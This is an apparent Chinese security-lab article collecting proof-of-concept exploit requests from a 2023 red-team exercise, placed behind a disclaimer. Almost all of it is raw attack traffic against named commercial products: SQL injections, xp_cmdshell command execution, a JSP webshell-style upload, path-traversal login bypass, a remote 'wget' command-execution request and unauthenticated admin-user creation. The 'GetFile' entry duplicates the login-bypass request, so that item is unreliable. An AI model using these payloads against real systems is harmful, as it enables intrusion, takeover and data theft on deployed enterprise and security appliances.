查看原文
其他

2023攻防演练第二日漏洞POC合集

CVES实验室 山海之关 2023-08-12

免责声明

1. 本文仅用于技术交流,目的是向相关安全人员展示漏洞的存在和利用方式,以便更好地提高网络安全意识和技术水平。

2. 任何人不得利用本文中的技术手段进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。

3. 本文中提到的漏洞验证 poc 仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用此 poc。

4. CVES实验室对使用此 poc 导致的任何直接或间接损失不承担任何责任。使用此 poc 的风险由使用者自行承担。

POC合集

泛微 E-Cology 某版本 SQL注入漏洞 POC

POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1Host: ip:port User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeContent-Length: 189Content-Type: text/plainAccept-Encoding: gzip
callCount=1page=httpSessionId=scriptSessionId=c0-scriptName=DocDwrUtilc0-methodName=ifNewsCheckOutByCurrentUserc0-id=0c0-param0=string:1 AND 1=1c0-param1=string:1batchId=0

金和OA C6-GetSqlData.aspx SQL注入漏洞 POC

POST /C6/Control/GetSqlData.aspx/.ashxHost: ip:port User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36Connection: closeContent-Length: 189Content-Type: text/plainAccept-Encoding: gzip
exec master..xp_cmdshell 'ipconfig'

大华智慧园区综合管理平台 searchJson SQL注入漏洞 POC

GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(388609)),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1Host: 127.0.0.1:7443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflateConnection: close

大华智慧园区综合管理平台 文件上传漏洞 POC

POST /publishing/publishing/material/file/video HTTP/1.1Host: 127.0.0.1:7443User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 804Content-Type: multipart/form-data; boundary=dd8f988919484abab3816881c55272a7Accept-Encoding: gzip, deflateConnection: close
--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Filedata"; filename="0EaE10E7dF5F10C2.jsp"
<%@page contentType="text/html; charset=GBK"%><%@page import="java.math.BigInteger"%><%@page import="java.security.MessageDigest"%><% MessageDigest md5 = null;md5 = MessageDigest.getInstance("MD5");String s = "123456";String miyao = "";String jiamichuan = s + miyao;md5.update(jiamichuan.getBytes());String md5String = new BigInteger(1, md5.digest()).toString(16);out.println(md5String);new java.io.File(application.getRealPath(request.getServletPath())).delete();%>--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="poc"
poc--dd8f988919484abab3816881c55272a7Content-Disposition: form-data; name="Submit"
submit--dd8f988919484abab3816881c55272a7--

用友时空KSOA PayBill SQL注入漏洞 POC

POST /servlet/PayBill?caculate&_rnd= HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Length: 134Accept-Encoding: gzip, deflateConnection: close
<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>

命令执行:

exec master..xp_cmdshell 'whoami';

绿盟 SAS堡垒机 local_user.php 任意用户登录漏洞 POC

GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzip, deflateConnection: close

绿盟 SAS堡垒机 GetFile 任意文件读取漏洞 POC

GET /api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateConnection: close

绿盟 SAS堡垒机 Exec 远程命令执行漏洞 POC

GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1Host: 1.1.1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateConnection: close

安恒 明御运维审计与风险控制系统 xmlrpc.sock 任意用户添加漏洞 POC

POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1Host: 10.10.10.10Cookie: Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Connection: close
<?xml version="1.0"?> <methodCall><methodName>web.user_add</methodName><params><param><value><array><data><value><string>admin</string></value><value><string>5</string></value><value><string>10.10.10.10</string></value></data></array></value></param><param><value><struct><member><name>uname</name><value><string>test</string></value></member><member><name>name</name><value><string>test</string></value></member><member><name>pwd</name><value><string>ABC123!@#</string></value></member><member><name>authmode</name><value><string>1</string></value></member><member><name>deptid</name><value><string></string></value></member><member><name>email</name><value><string></string></value></member><member><name>mobile</name><value><string></string></value></member><member><name>comment</name><value><string></string></value></member><member><name>roleid</name><value><string>102</string></value></member></struct></value></param></params></methodCall>

CVES实验室

      “CVES实验室”(www.cves.io)由团队旗下SRC组与渗透组合并而成,专注于漏洞挖掘、渗透测试与情报分析等方向。近年来我们报送漏洞总数已达八万余个,其中包含多个部级单位、多个通信运营商、Apache、Nginx、Thinkphp等,获得CNVD证书、CVE编号数百个,在不同规模的攻防演练活动中获奖无数,协助有关部门破获多起省督级别的案件。

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存